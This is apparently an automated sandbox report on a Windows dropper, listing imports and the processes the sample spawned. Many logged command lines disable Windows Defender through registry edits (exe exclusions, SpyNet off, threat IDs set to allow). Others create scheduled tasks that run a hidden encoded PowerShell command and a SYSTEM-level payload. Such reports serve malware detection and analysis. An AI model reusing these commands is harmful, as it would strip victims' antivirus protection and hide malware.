                            USER32.dll | SendMessageA, SetTimer, DialogBoxParamW, DialogBoxParamA, SetWindowLongA, GetWindowLongA, SetWindowTextW, LoadIconA, LoadStringW, LoadStringA, CharUpperW, CharUpperA, DestroyWindow, EndDialog, PostMessageA, ShowWindow, MessageBoxW, GetDlgItem, KillTimer, SetWindowTextA
                            SHELL32.dll | ShellExecuteExA
                            KERNEL32.dll | GetStringTypeW, GetStringTypeA, LCMapStringW, LCMapStringA, InterlockedIncrement, InterlockedDecrement, GetProcAddress, GetOEMCP, GetACP, GetCPInfo, IsBadCodePtr, IsBadReadPtr, GetFileType, SetHandleCount, GetEnvironmentStringsW, GetEnvironmentStrings, FreeEnvironmentStringsW, FreeEnvironmentStringsA, UnhandledExceptionFilter, HeapSize, GetCurrentProcess, TerminateProcess, IsBadWritePtr, HeapCreate, HeapDestroy, GetEnvironmentVariableA, SetUnhandledExceptionFilter, TlsAlloc, ExitProcess, GetVersion, GetCommandLineA, GetStartupInfoA, GetModuleHandleA, WaitForSingleObject, CloseHandle, CreateProcessA, SetCurrentDirectoryA, GetCommandLineW, GetVersionExA, LeaveCriticalSection, EnterCriticalSection, DeleteCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetLastError, LoadLibraryA, AreFileApisANSI, GetModuleFileNameA, GetModuleFileNameW, LocalFree, FormatMessageA, FormatMessageW, GetWindowsDirectoryA, SetFileTime, CreateFileW, SetLastError, SetFileAttributesA, RemoveDirectoryA, SetFileAttributesW, RemoveDirectoryW, CreateDirectoryA, CreateDirectoryW, DeleteFileA, DeleteFileW, lstrlenA, GetFullPathNameA, GetFullPathNameW, GetCurrentDirectoryA, GetTempPathA, GetTempFileNameA, FindClose, FindFirstFileA, FindFirstFileW, FindNextFileA, CreateFileA, GetFileSize, SetFilePointer, ReadFile, WriteFile, SetEndOfFile, GetStdHandle, WaitForMultipleObjects, Sleep, VirtualAlloc, VirtualFree, CreateEventA, SetEvent, ResetEvent, InitializeCriticalSection, RtlUnwind, RaiseException, HeapAlloc, HeapFree, HeapReAlloc, CreateThread, GetCurrentThreadId, TlsSetValue, TlsGetValue, ExitThread
                            Language of compilation system | Country where language is spoken | Map
                            English | United States |
                            No network behavior found

                            Target ID:0
                            Start time:16:10:59
                            Start date:31/12/2022
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\Desktop\file.exe
                            Imagebase:0x400000
                            File size:7607851 bytes
                            MD5 hash:4A0ACE7E59A840307EAFE3C5975A7638
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:1
                            Start time:16:11:01
                            Start date:31/12/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS7660.tmp\Install.exe
                            Wow64 process (32bit):true
                            Commandline:.\Install.exe
                            Imagebase:0x400000
                            File size:6612583 bytes
                            MD5 hash:ACF9F750C53A4655AF0F2C792DC05166
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:low

                            Target ID:2
                            Start time:16:11:03
                            Start date:31/12/2022
                            Path:C:\Users\user\AppData\Local\Temp\7zS7E6E.tmp\Install.exe
                            Wow64 process (32bit):true
                            Commandline:.\Install.exe /S /site_id "525403"
                            Imagebase:0x920000
                            File size:7164928 bytes
                            MD5 hash:C58B38377096B7C07958599E0E0C361A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 65%, ReversingLabs
                            Reputation:low

                            Target ID:3
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0x960000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:4
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:5
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\forfiles.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0x960000
                            File size:41472 bytes
                            MD5 hash:4329CB18F8F74CC8DDE2C858BB80E5D8
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:6
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:7
                            Start time:16:11:06
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:8
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:9
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:10
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Reputation:high

                            Target ID:11
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:12
                            Start time:16:11:07
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:13
                            Start time:16:11:11
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "goSRLihgj" /SC once /ST 00:45:25 /F /RU "user" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                            Imagebase:0x7ff7c72c0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:14
                            Start time:16:11:12
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:15
                            Start time:16:11:12
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /run /I /tn "goSRLihgj"
                            Imagebase:0xcd0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:16
                            Start time:16:11:12
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:17
                            Start time:16:11:13
                            Start date:31/12/2022
                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                            Imagebase:0x7ff6369d0000
                            File size:447488 bytes
                            MD5 hash:95000560239032BC68B4C2FDFCDEF913
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:.Net C# or VB.NET

                            Target ID:18
                            Start time:16:11:13
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:19
                            Start time:16:11:13
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /DELETE /F /TN "goSRLihgj"
                            Imagebase:0xcd0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:20
                            Start time:16:11:14
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff61e220000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:21
                            Start time:16:11:17
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\schtasks.exe
                            Wow64 process (32bit):true
                            Commandline:schtasks /CREATE /TN "bbrwVHWbINAVAbZleQ" /SC once /ST 16:12:00 /RU "SYSTEM" /TR "\"C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe\" UB /site_id 525403 /S" /V1 /F
                            Imagebase:0xcd0000
                            File size:185856 bytes
                            MD5 hash:15FF7D8324231381BAD48A052F85DF04
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:22
                            Start time:16:11:17
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:23
                            Start time:16:11:19
                            Start date:31/12/2022
                            Path:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe
                            Wow64 process (32bit):true
                            Commandline:C:\Users\user\AppData\Local\Temp\COVpFhPtqYPoUNuBL\zKYzpPsGIVIslMC\KZDOWch.exe UB /site_id 525403 /S
                            Imagebase:0xdf0000
                            File size:7164928 bytes
                            MD5 hash:C58B38377096B7C07958599E0E0C361A
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Antivirus matches:
                            • Detection: 100%, Avira
                            • Detection: 65%, ReversingLabs

                            Target ID:24
                            Start time:16:11:21
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            Wow64 process (32bit):true
                            Commandline:powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;"
                            Imagebase:0x970000
                            File size:430592 bytes
                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:.Net C# or VB.NET

                            Target ID:25
                            Start time:16:11:21
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:26
                            Start time:16:11:27
                            Start date:31/12/2022
                            Path:C:\Windows\System32\gpupdate.exe
                            Wow64 process (32bit):false
                            Commandline:"C:\Windows\system32\gpupdate.exe" /force
                            Imagebase:0x7ff62ab60000
                            File size:29184 bytes
                            MD5 hash:47C68FE26B0188CDD80F744F7405FF26
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:27
                            Start time:16:11:28
                            Start date:31/12/2022
                            Path:C:\Windows\System32\conhost.exe
                            Wow64 process (32bit):false
                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Imagebase:0x7ff7c72c0000
                            File size:625664 bytes
                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                            Has elevated privileges:false
                            Has administrator privileges:false
                            Programmed in:C, C++ or other language

                            Target ID:30
                            Start time:16:11:29
                            Start date:31/12/2022
                            Path:C:\Windows\System32\gpscript.exe
                            Wow64 process (32bit):false
                            Commandline:gpscript.exe /RefreshSystemParam
                            Imagebase:0x7ff612990000
                            File size:44544 bytes
                            MD5 hash:C48CBDC676E442BAF58920C5B7E556DE
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:31
                            Start time:16:11:48
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\cmd.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xd90000
                            File size:232960 bytes
                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:32
                            Start time:16:11:48
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:33
                            Start time:16:11:49
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:34
                            Start time:16:11:50
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:35
                            Start time:16:11:51
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:36
                            Start time:16:11:51
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:37
                            Start time:16:11:52
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:38
                            Start time:16:11:52
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:39
                            Start time:16:11:52
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:40
                            Start time:16:11:53
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:41
                            Start time:16:11:53
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:42
                            Start time:16:11:54
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:44
                            Start time:16:11:54
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:46
                            Start time:16:11:55
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language

                            Target ID:47
                            Start time:16:11:55
                            Start date:31/12/2022
                            Path:C:\Windows\SysWOW64\reg.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                            Imagebase:0xb10000
                            File size:59392 bytes
                            MD5 hash:CEE2A7E57DF2A159A065A34913A055C2
                            Has elevated privileges:true
                            Has administrator privileges:true
